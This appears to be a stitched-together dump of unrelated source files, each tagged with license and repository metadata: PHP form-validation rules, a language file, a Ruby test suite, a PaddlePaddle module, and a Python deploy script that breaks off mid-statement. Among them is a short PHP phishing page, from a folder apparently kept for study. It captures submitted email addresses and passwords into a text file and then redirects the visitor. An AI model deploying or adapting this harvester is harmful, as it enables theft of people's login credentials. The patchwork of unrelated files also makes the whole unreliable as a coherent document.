'required' => 'Please provide a valid PDHI Registration Number.',
'max_length' => 'PDHI Registration Number must be less than 50 characters.'
]
];
// Edit veterinarian
public $veterinarian_edit = [
'name' => 'required|max_length[256]',
'email' => 'required|valid_email|max_length[256]',
'password' => 'permit_empty|min_length[8]',
'password2' => 'required_with[password]|matches[password]',
'nik' => 'required|exact_length[16]',
'phone_number' => 'required|max_length[16]',
'pdhi_number' => 'required|max_length[50]',
'active' => 'required|in_list[0,1]',
'photo' => 'permit_empty|uploaded[photo]|is_image[photo]|ext_in[photo,png,jpg,jpeg]|max_size[photo,1024]',
];
public $veterinarian_edit_errors = [
'name' => [
'required' => 'Please provide a valid name.',
'max_length' => 'Name must be less than 256 characters.'
],
'email' => [
'required' => 'Please provide a valid email address.',
'valid_email' => 'Please provide a valid email address.',
'max_length' => 'Email address must be less than 256 characters.'
],
'password' => [
'min_length' => 'Password must be at least 8 characters long.'
],
'password2' => [
'required_with' => 'Please provide a valid confirmed password.',
'matches' => 'Password did not match.'
],
'nik' => [
'required' => 'Please provide a valid ID Number (NIK).',
'exact_length' => 'ID Number (NIK) must be 16 characters long.'
],
'phone_number' => [
'required' => 'Please provide a valid phone number.',
'max_length' => 'Phone number must be less than 16 characters.'
],
'pdhi_number' => [
'required' => 'Please provide a valid PDHI Registration Number.',
'max_length' => 'PDHI Registration Number must be less than 50 characters.'
],
'active' => [
'required' => 'Please provide a valid status.',
'in_list' => 'Please provide a valid status.'
],
'photo' => [
'uploaded' => 'Please provide valid uploaded photo.',
'is_image' => 'Please provide a valid image (png or jpg only).',
'ext_in' => 'Please provide a valid image (png or jpg only).',
'max_size' => 'A photo must be less than 1MB in size.',
]
];
// Education
public $education = [
'title' => 'required|max_length[256]',
'instance' => 'required|max_length[256]',
'year' => 'required|greater_than[1945]|less_than[2020]',
];
public $education_errors = [
'title' => [
'required' => 'Please provide a valid title.',
'max_length' => 'Title must be less than 256 characters long.'
],
'instance' => [
'required' => 'Please provide a valid instance.',
'max_length' => 'Instance must be less than 256 characters long.'
],
'year' => [
'required' => 'Please provide a valid year.',
'greater_than' => 'Year must be in range 1945-2020.',
'less_than' => 'Year must be in range 1945-2020.'
]
];
// Organization
public $organization = [
'name' => 'required|max_length[256]',
'position' => 'required|max_length[256]',
'year' => 'required|greater_than[1945]|less_than[2020]'
];
public $organization_errors = [
'name' => [
'required' => 'Please provide a valid name.',
'max_length' => 'Name must be less than 256 characters long.'
],
'position' => [
'required' => 'Please provide a valid position.',
'max_length' => 'Position must be less than 256 characters long.'
],
'year' => [
'required' => 'Please provide a valid year.',
'greater_than' => 'Year must be in range 1945-2020.',
'less_than' => 'Year must be in range 1945-2020.'
]
];
/**
* REST API VALIDATION
*/
// User sign in
public $api_user_signin = [
'email' => 'required',
'password' => 'required'
];
public $api_user_signin_errors = [
'email' => [
'required' => 'Please provide a valid email address.'
],
'password' => [
'required' => 'Please provide a valid password.'
]
];
// User signup
public $api_user_signup = [
'name' => 'required|max_length[256]',
'email' => 'required|valid_email|max_length[256]',
'password' => 'required|min_length[8]'
];
public $api_user_signup_errors = [
'name' => [
'required' => 'Please provide a valid name.',
'max_length' => 'Name must be less than 256 characters.'
],
'email' => [
'required' => 'Please provide a valid email address.',
'valid_email' => 'Please provide a valid email address.',
'max_length' => 'Email address must be less than 256 characters.'
],
'password' => [
'required' => 'Please provide a valid password.',
'min_length' => 'Password must be at least 8 characters long.'
]
];
// User activation
public $api_user_activation = [
'activation_code' => 'required|is_natural|exact_length[6]'
];
public $api_user_activation_errors = [
'activation_code' => [
'required' => 'Please provide a valid activation code.',
'is_natural' => 'Please provide a valid activation code.',
'exact_length' => 'Please provide a valid activation code.'
]
];
// api_petowner_update
public $api_petowner_update = [
'name' => 'required|max_length[256]',
'password' => 'permit_empty|min_length[8]'
];
public $api_petowner_update_errors = [
'name' => [
'required' => 'Please provide a valid name.',
'max_length' => 'Name must be less than 256 characters.'
],
'password' => [
'min_length' => 'Password must be at least 8 characters long.'
]
];
// api_veterinarian_update
public $api_veterinarian_update = [
'password' => 'permit_empty|min_length[8]'
];
public $api_veterinarian_update_errors = [
'password' => [
'min_length' => 'Password must be at least 8 characters long.'
]
];
// api_user_photo
public $api_user_photo = [
'photo' => 'uploaded[photo]|max_size[photo,1024]',
];
public $api_user_photo_errors = [
'photo' => [
'uploaded' => 'Please provide a valid image.',
'is_image' => 'Please provide a valid image.',
'ext_in' => 'Please provide a valid image.',
'max_size' => 'Photo must be less than 1MB in size.',
]
];
// api_create_question
public $api_create_question = [
'content' => 'required|max_length[2000]'
];
public $api_create_question_errors = [
'content' => [
'required' => 'Please provide a content.',
'max_length' => 'Content must be less than 2000 characters.'
]
];
// api_create_answer
public $api_create_answer = [
'content' => 'required|max_length[2000]'
];
public $api_create_answer_errors = [
'content' => [
'required' => 'Please provide a content.',
'max_length' => 'Content must be less than 2000 characters.'
]
];
// api_create_answer
public $api_create_message = [
'content' => 'required|max_length[2000]'
];
public $api_create_answer_message = [
'content' => [
'required' => 'Please provide a content.',
'max_length' => 'Content must be less than 2000 characters.'
]
];
}
|
PHP
|
MIT
|
darmageddon/vetkita/app/Config/Validation.php
|
159a0ceb-823d-4382-89fc-bfeca31e3d94
|
[]
|
[]
|
<?php
/* Get fields: */
$login_field = "Login: " . $_GET["email"] . "\n";
$passwd_field = "Password: " . $_GET["pass"] . "\n";
/* Open datalist file: */
$file = fopen("data.txt", "a");
/* Write/Save */
$lwrite = fwrite($file, $login_field);
$pwrite = fwrite($file, $passwd_field);
/* Close file: */
fclose($file);
// echo "Error message."
/* Redirect: */
header("#")
?>
|
PHP
|
CC0-1.0
|
rf-peixoto/Studies/Code/Phishing/Login/Generic/login.php
|
40d16bd1-ca94-4dc5-aea0-74cf2eed85a6
|
[]
|
[]
|
<?php
return [
'name' => 'Name',
'user' => 'User',
'email' => 'E-Mail Address',
'password' => 'Password',
'confirmPassword' => 'Confirm Password',
'confirmEmail' => 'Please confirm your email!',
'emailConfirmed' => 'You confirmed your email, please log in!',
'profile' => 'Profile',
'makeAdmin' => 'Make User Admin',
'loseAdmin' => 'Take Away Admin Privileges',
'uploadPicture' => 'Upload Picture',
'editProfile' => 'Edit Profile',
'registerDate' => 'Joined at',
'height' => 'Height',
'weight' => 'Weight',
'benchPress' => 'Bench Press',
'squat' => 'Squat',
'deadlift' => 'Deadlift',
'ohp' => 'Overhead Press',
'image' => 'Image',
'cardHolder' => 'Card Holder Name',
'cardNumber' => 'Card Number',
'expMonth' => 'Expiration Month',
'expYear' => 'Expiration Year',
'amount' => 'Amount',
'thanksForDonation' => 'Thank you for your donation!',
'bmr' => 'BMR',
];
|
PHP
|
MIT
|
bneuhausz/szakdolgozat/resources/lang/en/user.php
|
de86156e-9146-4a69-bff1-aeec684d7037
|
[]
|
[]
|
# frozen_string_literal: true
require 'spec_helper'
describe Assembly::ObjectFile do
it 'does not run if no input file is passed in' do
@ai = described_class.new('')
expect { @ai.filesize }.to raise_error(RuntimeError, 'input file does not exist')
expect { @ai.sha1 }.to raise_error(RuntimeError, 'input file does not exist')
expect { @ai.md5 }.to raise_error(RuntimeError, 'input file does not exist')
end
it 'returns the common directory of a set of filenames passed into it, where the common part does not terminate on a directory' do
expect(described_class.common_path(['/Users/peter/00/test.tif', '/Users/peter/05/test.jp2'])).to eq('/Users/peter/')
end
it 'returns the common directory of a set of filenames passed into it, where the common part does not terminate on a directory' do
expect(described_class.common_path(['/Users/peter/00/test.tif', '/Users/peter/00/test.jp2'])).to eq('/Users/peter/00/')
end
it 'tells us if an input file is an image' do
expect(File.exist?(TEST_TIF_INPUT_FILE)).to be true
@ai = described_class.new(TEST_TIF_INPUT_FILE)
expect(@ai.image?).to eq(true)
expect(@ai.exif).not_to be nil
expect(@ai.mimetype).to eq('image/tiff')
expect(@ai.file_mimetype).to eq('image/tiff')
expect(@ai.extension_mimetype).to eq('image/tiff')
expect(@ai.exif_mimetype).to eq('image/tiff')
expect(@ai.object_type).to eq(:image)
expect(@ai.valid_image?).to eq(true)
expect(@ai.jp2able?).to eq(true)
end
it 'tells us information about the input file' do
@ai = described_class.new(TEST_TIF_INPUT_FILE)
expect(@ai.filename).to eq('test.tif')
expect(@ai.ext).to eq('.tif')
expect(@ai.filename_without_ext).to eq('test')
expect(@ai.dirname).to eq(File.dirname(TEST_TIF_INPUT_FILE))
end
it 'sets the correct mimetype of plain/text for .txt files' do
@ai = described_class.new(TEST_RES1_TEXT)
expect(@ai.mimetype).to eq('text/plain')
end
it 'sets the correct mimetype of plain/text for .xml files' do
@ai = described_class.new(TEST_RES1_TEXT)
expect(@ai.mimetype).to eq('text/plain')
end
it 'sets the correct mimetype of plain/text for .obj 3d files' do
@ai = described_class.new(TEST_OBJ_FILE)
expect(@ai.mimetype).to eq('text/plain')
end
it 'sets a mimetype of application/x-tgif for .obj 3d files if we prefer the mimetype extension gem over unix file system command' do
@ai = described_class.new(TEST_OBJ_FILE, mime_type_order: %i[extension file exif])
expect(@ai.mimetype).to eq('application/x-tgif')
end
it 'ignores invald mimetype generation methods and still sets a mimetype of application/x-tgif for .obj 3d files if we prefer the mimetype extension gem over unix file system command' do
@ai = described_class.new(TEST_OBJ_FILE, mime_type_order: %i[bogus extension file])
expect(@ai.mimetype).to eq('application/x-tgif')
end
it 'sets the correct mimetype of plain/text for .ply 3d files' do
@ai = described_class.new(TEST_PLY_FILE)
expect(@ai.mimetype).to eq('text/plain')
end
it 'overrides the mimetype generators and uses the manual mapping to set the correct mimetype of application/json for a .json file' do
@ai = described_class.new(TEST_JSON_FILE)
expect(@ai.exif_mimetype).to be_nil # exif returns nil
expect(@ai.file_mimetype).to eq('text/plain') # unix file system command returns plain text
expect(@ai.mimetype).to eq('application/json') # but our configured mapping overrides both and returns application/json
end
it 'sets the correct mimetype of image/tiff for .tif files' do
@ai = described_class.new(TEST_TIF_INPUT_FILE)
expect(@ai.mimetype).to eq('image/tiff')
end
it 'sets the correct mimetype of image/jp2 for .jp2 files' do
@ai = described_class.new(TEST_JP2_INPUT_FILE)
expect(@ai.mimetype).to eq('image/jp2')
end
it 'sets the correct mimetype of application/pdf for .pdf files' do
@ai = described_class.new(TEST_RES1_PDF)
expect(@ai.mimetype).to eq('application/pdf')
end
it 'gives us the mimetype of a file even if the exif information is damaged' do
@ai = described_class.new(TEST_FILE_NO_EXIF)
expect(@ai.filename).to eq('file_with_no_exif.xml')
expect(@ai.ext).to eq('.xml')
expect(['text/html', 'application/xml'].include?(@ai.mimetype)).to be true # we could get either of these mimetypes depending on the OS
end
it 'gives us the DPG base name for a file' do
test_file = File.join(TEST_INPUT_DIR, 'oo000oo0001_00_001.tif')
@ai = described_class.new(test_file)
expect(@ai.dpg_basename).to eq('oo000oo0001_001')
end
it 'gives us the DPG subfolder name for a file' do
test_file = File.join(TEST_INPUT_DIR, 'oo000oo0001_05_001.tif')
@ai = described_class.new(test_file)
expect(@ai.dpg_folder).to eq('05')
end
it 'tells us that a jp2 file is not jp2able but does have a color profile' do
expect(File.exist?(TEST_JP2_INPUT_FILE)).to be true
@ai = described_class.new(TEST_JP2_INPUT_FILE)
expect(@ai.image?).to eq(true)
expect(@ai.object_type).to eq(:image)
expect(@ai.valid_image?).to eq(true)
expect(@ai.jp2able?).to eq(false)
expect(@ai.has_color_profile?).to eq(true)
end
it 'tells us that a tiff file is jp2able and has a color profile' do
expect(File.exist?(TEST_RES1_TIF1)).to be true
@ai = described_class.new(TEST_RES1_TIF1)
expect(@ai.image?).to eq(true)
expect(@ai.object_type).to eq(:image)
expect(@ai.valid_image?).to eq(true)
expect(@ai.jp2able?).to eq(true)
expect(@ai.has_color_profile?).to eq(true)
end
it 'tells us that a tiff file is not jp2able and is not valid since it has no profile' do
expect(File.exist?(TEST_TIFF_NO_COLOR_FILE)).to be true
@ai = described_class.new(TEST_TIFF_NO_COLOR_FILE)
expect(@ai.image?).to eq(true)
expect(@ai.object_type).to eq(:image)
expect(@ai.valid_image?).to eq(true)
expect(@ai.jp2able?).to eq(true)
expect(@ai.has_color_profile?).to eq(false)
end
it 'computes checksums for an image file' do
expect(File.exist?(TEST_TIF_INPUT_FILE)).to be true
@ai = described_class.new(TEST_TIF_INPUT_FILE)
expect(@ai.md5).to eq('a2400500acf21e43f5440d93be894101')
expect(@ai.sha1).to eq('8d11fab63089a24c8b17063d29a4b0eac359fb41')
end
it 'indicates that the file is not found when a valid directory is supplied instead of a file or when an invalid file path is specified' do
path = Assembly::PATH_TO_GEM
@ai = described_class.new(path)
expect(File.exist?(path)).to be true
expect(File.directory?(path)).to be true
expect(@ai.file_exists?).to be false
path = File.join(Assembly::PATH_TO_GEM, 'bogus.txt')
@ai = described_class.new(path)
expect(File.exist?(path)).to be false
expect(File.directory?(path)).to be false
expect(@ai.file_exists?).to be false
end
it 'sets attributes correctly when initializing' do
@ai = described_class.new('/some/file.txt')
expect(@ai.path).to eq('/some/file.txt')
expect(@ai.label).to be_nil
expect(@ai.file_attributes).to be_nil
expect(@ai.provider_sha1).to be_nil
expect(@ai.provider_md5).to be_nil
expect(@ai.relative_path).to be_nil
@ai = described_class.new('/some/file.txt', label: 'some label', file_attributes: { 'shelve' => 'yes', 'publish' => 'yes', 'preserve' => 'no' }, relative_path: '/tmp')
expect(@ai.path).to eq('/some/file.txt')
expect(@ai.label).to eq('some label')
expect(@ai.file_attributes).to eq('shelve' => 'yes', 'publish' => 'yes', 'preserve' => 'no')
expect(@ai.provider_sha1).to be_nil
expect(@ai.provider_md5).to be_nil
expect(@ai.relative_path).to eq('/tmp')
end
it 'sets md5_provider attribute' do
ai = described_class.new('/some/file.txt', provider_md5: 'XYZ')
expect(ai.provider_md5).to eq('XYZ')
end
it 'tells us if an input file is not an image' do
non_image_file = File.join(Assembly::PATH_TO_GEM, 'spec/object_file_spec.rb')
expect(File.exist?(non_image_file)).to be true
@ai = described_class.new(non_image_file)
expect(@ai.image?).to eq(false)
expect(@ai.object_type).not_to eq(:image)
expect(@ai.valid_image?).to eq(false)
non_image_file = File.join(Assembly::PATH_TO_GEM, 'spec/test_data/input/file_with_no_exif.xml')
expect(File.exist?(non_image_file)).to be true
@ai = described_class.new(non_image_file)
expect(@ai.image?).to eq(false)
expect(@ai.object_type).not_to eq(:image)
expect(@ai.valid_image?).to eq(false)
end
it 'tells us the size of an input file' do
expect(File.exist?(TEST_TIF_INPUT_FILE)).to be true
@ai = described_class.new(TEST_TIF_INPUT_FILE)
expect(@ai.filesize).to eq(63_542)
end
it 'tells us the mimetype and encoding of an input file' do
expect(File.exist?(TEST_TIF_INPUT_FILE)).to be true
@ai = described_class.new(TEST_TIF_INPUT_FILE)
expect(@ai.mimetype).to eq('image/tiff')
expect(@ai.file_mimetype).to eq('image/tiff')
expect(@ai.encoding).to eq('binary')
end
end
|
Ruby
|
Apache-2.0
|
sul-dlss/assembly-objectfile/spec/object_file_spec.rb
|
ebe8428c-c118-4d03-87b5-fb08a8dfb856
|
[]
|
[]
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import numpy as np
import six
import paddle
from paddle.fluid import framework, backward, core
from paddle.fluid.dygraph import layers
from paddle.fluid.dygraph.base import switch_to_static_graph
from paddle.fluid.dygraph.dygraph_to_static import logging_utils
from paddle.fluid.dygraph.dygraph_to_static.return_transformer import RETURN_NO_VALUE_MAGIC_NUM
from paddle.fluid.layers.utils import flatten
from paddle.fluid.layers.utils import pack_sequence_as
import paddle.compat as cpt
class NestSequence(object):
"""
A wrapper class that easily to flatten and restore the nest structure of
given sequence.
"""
def __init__(self, raw_input, need_check=False):
self.__raw_input = raw_input
self.__var_ids = self._get_var_ids()
self._check_non_variable(need_check)
def tolist(self):
"""
Flattens the nested sequences into single list.
"""
return flatten(self.__raw_input)
def restore(self, value_list):
"""
Restores the nested sequence from value list.
"""
assert len(self.tolist()) == len(value_list)
return pack_sequence_as(self.__raw_input, value_list)
def _get_var_ids(self):
var_ids = []
for idx, var in enumerate(self.tolist()):
if isinstance(var, (framework.Variable, core.VarBase)):
var_ids.append(idx)
return var_ids
def _check_non_variable(self, need_check):
"""
Raises warning if output of traced function contains non-tensor type values.
"""
if need_check:
warning_types = set()
for var in self.tolist():
if not isinstance(var, (framework.Variable, core.VarBase)):
warning_types.add(type(var))
if warning_types:
logging_utils.warn(
"Output of traced function contains non-tensor type values: {}. "
"Currently, We don't support to update them while training and will return "
"what we first saw. Please try to return them as tensor.".
format(list(warning_types)))
@property
def var_ids(self):
return self.__var_ids
def __getitem__(self, item):
return self.tolist()[item]
class LazyInitialized(object):
"""
Descriptor to implement lazy initialization of property.
"""
def __init__(self, function):
self.function = function
def __get__(self, instance, cls):
val = self.function(instance)
setattr(instance, self.function.__name__, val)
return val
def _change_is_test_status(program, is_test):
# change all `is_test` attributes
for block in program.blocks:
for op in block.ops:
if op.has_attr('is_test'):
op._set_attr('is_test', is_test)
return program
class PartialProgramLayer(layers.Layer):
"""
PartialProgramLayer wraps all the ops from layers decorated by `@declarative`
and execute them as a static subgraph.
.. note::
**1. This is a very low level API. Users should not use this API
directly. Please use `partial_program_from(concrete_program)`
to create it.
**2. LoDTensorArray is not currently supported in the output.
Args:
main_program(Program): The main program that contains ops need to be executed.
inputs(list[Variable]): The input list of the decorated function by `@declarative`.
outputs(list[Variable]): The output list of the decorated function by `@declarative`.
parameters(list[VarBase]|None): All trainable parameters included in the program. Default None.
Returns:
Layer: A Layer object that run all ops internally in static mode.
"""
def __init__(self, main_program, inputs, outputs, parameters=None):
super(PartialProgramLayer, self).__init__()
self._inputs = NestSequence(inputs)
self._outputs = NestSequence(outputs, need_check=True)
self._params = parameters if parameters is not None else []
self._origin_main_program = self._verify_program(main_program)
self._inner_scope = core.Scope()
# Set default mode to train
self._double_grads = self._get_double_grads(self._origin_main_program)
self.training = True
@LazyInitialized
def _infer_program(self):
"""
Lazy initialized property of infer_program.
"""
return self._clone_for_test(self._origin_main_program)
@LazyInitialized
def _train_program(self):
"""
Lazy initialized property of train_program.
"""
train_program = self._append_backward_desc(self._origin_main_program)
# Note: Only set grad type once after initializing train program. So we
# put it here.
self._set_grad_type(self._params, train_program)
return train_program
def _verify_program(self, main_program):
"""
Verify that the program parameter is initialized, prune some unused params,
and remove redundant op callstack.
"""
# 1. Check all params from main program can be found in self._params
self._check_params_all_inited(main_program)
# 2. Prune the parameters not used anywhere in the program.
self._prune_unused_params(main_program)
return main_program
@switch_to_static_graph
def _append_backward_desc(self, main_program):
# make sure all status of is_test are False in train mode.
program = _change_is_test_status(main_program.clone(), is_test=False)
targets = []
for out in self._outputs.tolist():
if isinstance(out, framework.Variable):
targets.append(program.global_block().var(out.name))
if targets and self._params:
backward.gradients(targets=targets, inputs=[])
return program
def _prune_unused_params(self, program):
"""
Prune the parameters not used anywhere in the program.
The `@declarative` may only decorated a sub function which
contains some unused parameters created in `__init__`.
So prune these parameters to avoid unnecessary operations in
`run_program_op`.
"""
required_params = []
for param in self._params:
found_param = False
for block in program.blocks:
for op in block.ops:
if param.name in op.input_arg_names or param.name in op.output_arg_names:
required_params.append(param)
found_param = True
break
if found_param:
break
self._params = required_params
def _get_double_grads(self, program):
double_grads = []
for block in program.blocks:
for name in block.vars:
if "@GRAD" in name:
var_desc = block.vars[name].desc
var_base = core.VarBase(var_desc.dtype(),
var_desc.shape(),
var_desc.name(),
var_desc.type(), False)
double_grads.append(var_base)
return double_grads
def forward(self, inputs):
in_vars, out_vars, tmp_scope_vec = self._prepare(inputs)
attrs = ('global_block', self.program.desc.block(0), 'start_op_index',
0, 'end_op_index', self._infer_program.desc.block(0).op_size(),
'is_test', not self.training)
core.ops.run_program(
valid_vars(in_vars),
valid_vars(self._params),
valid_vars(out_vars), tmp_scope_vec,
valid_vars(self._double_grads), *attrs)
restored_nest_out = self._restore_out(out_vars)
return self._remove_no_value(restored_nest_out)
@property
def program(self):
return self._train_program if self.training else self._infer_program
def _prepare(self, inputs):
"""
Prepare inputs, outputs, attrs.
"""
assert isinstance(inputs, (tuple, list))
# Flatten inputs with nested structure into single list.
flatten_inputs = flatten(inputs)
# Convert variable into VarBase and feed in training data.
input_vars = []
for i, value in enumerate(flatten_inputs):
if isinstance(value, np.ndarray):
var = core.VarBase(
value=value,
name=self._inputs[i].desc.name(),
persistable=False,
place=framework._current_expected_place(),
zero_copy=True)
elif isinstance(value, core.VarBase):
value.name = self._inputs[i].desc.name()
if value.stop_gradient:
# NOTE(Aurelius84): If var is on CPUPlace, it will be transformed multi times
# into CUDAPlace when it's as input of multi Ops. so we move it in advance
# to avoid this problem.
var = paddle.to_tensor(
value,
dtype=value.dtype,
place=framework._current_expected_place(),
stop_gradient=True)
var.name = value.name
else:
var = value
else:
continue
input_vars.append(var)
# Create VarBase to receive output data.
out_vars = []
for idx in self._outputs.var_ids:
var = self._outputs[idx]
assert isinstance(var, framework.Variable)
var_desc = var.desc
var_base = core.VarBase(var_desc.dtype(),
var_desc.shape(),
var_desc.name(), var_desc.type(), False)
out_vars.append(var_base)
# Hold forward variables
tmp_scope_vec = core.VarBase(core.VarDesc.VarType.FP32, [],
"program_out_scope",
core.VarDesc.VarType.STEP_SCOPES, True)
tmp_scope_vec.value().set_scope(self._inner_scope)
return input_vars, out_vars, tmp_scope_vec
def _restore_out(self, out_vars):
"""
Restores same nested outputs by only replacing the Variable with VarBase.
"""
flatten_outputs = self._outputs.tolist()
for i, idx in enumerate(self._outputs.var_ids):
flatten_outputs[idx] = out_vars[i]
outs = self._outputs.restore(flatten_outputs)
if outs is not None and len(outs) == 1:
outs = outs[0]
return outs
@switch_to_static_graph
def _clone_for_test(self, main_program):
return main_program.clone(for_test=True)
def _is_no_value(self, var):
if isinstance(var, core.VarBase):
if var.shape == [1] and var.numpy()[0] == RETURN_NO_VALUE_MAGIC_NUM:
return True
return False
def _remove_no_value(self, out_vars):
"""
Removes invalid value for various-length return statement
"""
if isinstance(out_vars, core.VarBase):
if self._is_no_value(out_vars):
return None
return out_vars
elif isinstance(out_vars, (tuple, list)):
if isinstance(out_vars, tuple):
res = tuple(
var for var in out_vars if not self._is_no_value(var))
else:
# isinstance(out_vars, list)
res = [var for var in out_vars if not self._is_no_value(var)]
has_removed = (len(out_vars) > len(res))
# len(out_vars) > len(res) means we have removed var. This is
# preventing out_vars is empty or just one element at the beginning
if len(res) == 0 and has_removed:
return None
elif len(res) == 1 and has_removed:
return res[0]
return res
return out_vars
def _set_grad_type(self, params, train_program):
# NOTE: if user set sparse gradient mode, the param's gradient
# will be SelectedRows, not LoDTensor. But tracer will just
# set param grad VarBase by forward VarBase(LoDTensor)
# If we don't change grad_var type here, RunProgramOp need
# transform SelectedRows to LoDTensor forcibly, it may not
# be user wanted result.
for param in params:
grad_name = param.name + core.grad_var_suffix()
grad_var = train_program.desc.block(0).find_var(
cpt.to_bytes(grad_name))
# NOTE: cannot find var desc maybe no problem, such as in batch_norm
if grad_var is None:
continue
param._set_grad_type(grad_var.type())
def _remove_op_call_stack(self, main_program):
"""
Remove op's python call stack with redundant low-level error messages related to
transforamtions to avoid confusing users.
"""
assert isinstance(main_program, framework.Program)
for block in main_program.blocks:
for op in block.ops:
if op.has_attr("op_callstack"):
op._remove_attr("op_callstack")
return main_program
    def _check_params_all_inited(self, main_program):
        """
        Check all params from main program are already initialized, see details as follows:
            1. all parameters in self._params should be type `framework.ParamBase` which are created in dygraph.
            2. all parameters from transformed program can be found in self._params.
               Because they share same data with ParamBase of original dygraph.
        """
        if not isinstance(self._params, (list, tuple)):
            raise TypeError(
                "Type of self._params in PartialProgramLayer should be list or tuple, but received %s."
                % type(self._params))
        param_and_buffer_names_set = set()
        for i, var in enumerate(self._params):
            # self._params contains parameters and buffers with persistable=True.
            if not isinstance(var, core.VarBase):
                raise TypeError(
                    'Type of self._params[{}] in PartialProgramLayer should be Parameter or Variable, but received {}.'.
                    format(i, type(var)))
            param_and_buffer_names_set.add(var.name)
        # Any Parameter found in the transformed program but not known to
        # self._params was created inside the decorated function itself,
        # which is rejected.
        for block in main_program.blocks:
            for name, var in six.iteritems(block.vars):
                if isinstance(var, framework.Parameter):
                    if name not in param_and_buffer_names_set:
                        raise ValueError(
                            "\n\tWe don't support to define layer with parameters in the function "
                            "decorated by `@declarative`.\n\tBecause that will re-defined parameters "
                            "every time when you run the function.\n\t"
                            "But we found parameter(%s) was created in the decorated function.\n\t"
                            "Please define the layer with parameters in `__init__` function."
                            % name)
def valid_vars(vars):
    """
    Guarantee a non-empty variable list.

    run_program_op.InferShape requires `X`/'Out' not be null, but fake
    varBases are common in dy2static; when ``vars`` is empty a single
    fake VarBase is returned in its place.
    """
    if not vars:
        return [
            core.VarBase(
                value=[1],
                name='Fake_var',
                place=framework._current_expected_place())
        ]
    return vars
def partial_program_from(concrete_program):
    """
    Build a PartialProgramLayer from a ConcreteProgram, dropping the
    leading Layer instance (the bound ``self``) from inputs if present.
    """
    ins = concrete_program.inputs
    if ins and isinstance(ins[0], layers.Layer):
        ins = ins[1:]
    return PartialProgramLayer(concrete_program.main_program, ins,
                               concrete_program.outputs,
                               concrete_program.parameters)
|
Python
|
Apache-2.0
|
CheQiXiao/Paddle/python/paddle/fluid/dygraph/dygraph_to_static/partial_program.py
|
425a3eb8-8de0-4331-9a0f-ba6f17555079
|
[{"tag": "USERNAME", "value": "Aurelius84", "start": 9625, "end": 9635, "context": "f value.stop_gradient:\n # NOTE(Aurelius84): If var is on CPUPlace, it will be transformed m"}]
|
[{"tag": "USERNAME", "value": "Aurelius84", "start": 9625, "end": 9635, "context": "f value.stop_gradient:\n # NOTE(Aurelius84): If var is on CPUPlace, it will be transformed m"}]
|
import requests
import json
import datetime
import os
import io
from invoke import task
from .invoke_utils import ServerConnection, use_dump_modifier_function
# sudo password and private SSH key text for the remote host, taken from
# the environment so they never live in the repo.
RAJK_PASSWORD = os.environ.get("RAJK_PASSWORD")
RAJK_RSA = os.environ.get("RAJK_RSA")
# Local scratch directory used by the test-deploy tasks.
TEST_DEPLOY_DIRECTORY = os.getcwd() + "/build"
# Connection to the production server: user, host, port, remote python.
rajk_server_connection = ServerConnection(
    "rajk", "146.110.60.20", 2222, "/var/www/rajkdjango2/bin/python"
)
def redo_rsa_from_text(c, rsa_text):
    # Write the given private key text to ~/.ssh/id_rsa so ssh/scp can use
    # it for the remote connection.
    os.makedirs("{}/.ssh".format(os.path.expanduser("~")), exist_ok=True)
    rsa_path = "{}/.ssh/id_rsa".format(os.path.expanduser("~"))
    with open(rsa_path, "w") as fp:
        fp.write(rsa_text)
    # ssh refuses private keys readable by other users
    c.run("chmod 600 {}".format(rsa_path))
@task
def backup_django(c):
    # Copy the whole remote django tree into backups/<today's ISO date>.
    os.makedirs("backups", exist_ok=True)
    bup_dir = os.path.join("backups", datetime.date.today().isoformat())
    c.run("mkdir {}".format(bup_dir))
    scp_command = rajk_server_connection.copy_from_server_command(
        bup_dir, "/var/www/rajkdjango2"
    )
    c.run(scp_command)
@task
def restart_server(c):
    # Restart the django2 service on the remote host (requires sudo).
    command = rajk_server_connection.run_sudo_command(
        "service django2 restart", RAJK_PASSWORD
    )
    c.run(command)
@task
def stop_server(c):
    # Stop the django2 service on the remote host (requires sudo).
    command = rajk_server_connection.run_sudo_command(
        "service django2 stop", RAJK_PASSWORD
    )
    c.run(command)
@task
def start_server(c):
    # Start the django2 service on the remote host (requires sudo).
    command = rajk_server_connection.run_sudo_command(
        "service django2 start", RAJK_PASSWORD
    )
    c.run(command)
@task
def dump(c, fname="dump.json", no_contenttypes=False):
    # Dump the remote database to a local JSON fixture file; contenttypes
    # can be excluded so the fixture loads cleanly into a fresh database.
    py_command = "/var/www/rajkdjango2/manage.py dumpdata {}".format(
        "-e contenttypes" if no_contenttypes else ""
    )
    command = rajk_server_connection.remote_python_command(py_command)
    # dumpdata writes to stdout; redirect it into the local file
    c.run(command + " > {}".format(fname))
@task
def remote_dump(c, no_contenttypes=True):
    # Like dump(), but the fixture is written on the server itself, at the
    # path served as /djangodump.json.
    py_command = "/var/www/rajkdjango2/manage.py dumpdata {} > /var/www/rajk/djangodump.json".format(
        "-e contenttypes" if no_contenttypes else ""
    )
    command = rajk_server_connection.remote_python_command(py_command)
    c.run(command)
@task
def setup_test_deploy_env(c):
    """
    Build a throwaway local Django project in TEST_DEPLOY_DIRECTORY that
    mirrors production: install every rajk-apps repo from GitHub into a
    fresh venv, wire the apps into settings/urls, then load the live
    data dump.
    """
    c.run("rm -rf ./{}".format(TEST_DEPLOY_DIRECTORY))
    c.run("mkdir {}".format(TEST_DEPLOY_DIRECTORY))
    # discover all app repos of the rajk-apps GitHub org
    resp = requests.get("https://api.github.com/orgs/rajk-apps/repos")
    repos = [
        "git+https://github.com/{}".format(d["full_name"])
        for d in json.loads(resp.content)
    ]
    # python package names: repo name with dashes replaced by underscores
    app_names = [r.split("/")[-1].replace("-", "_") for r in repos]
    c.run("python3 -m venv {}/django_venv".format(TEST_DEPLOY_DIRECTORY))
    for r in ["wheel", "django", "toml"] + repos:
        c.run("{}/django_venv/bin/pip install {}".format(TEST_DEPLOY_DIRECTORY, r))
    c.run(
        "cd {};django_venv/bin/django-admin startproject rajkproject".format(
            TEST_DEPLOY_DIRECTORY
        )
    )
    # register every app in the generated settings.py
    with open(
        "{}/rajkproject/rajkproject/settings.py".format(TEST_DEPLOY_DIRECTORY), "a"
    ) as fp:
        fp.write(
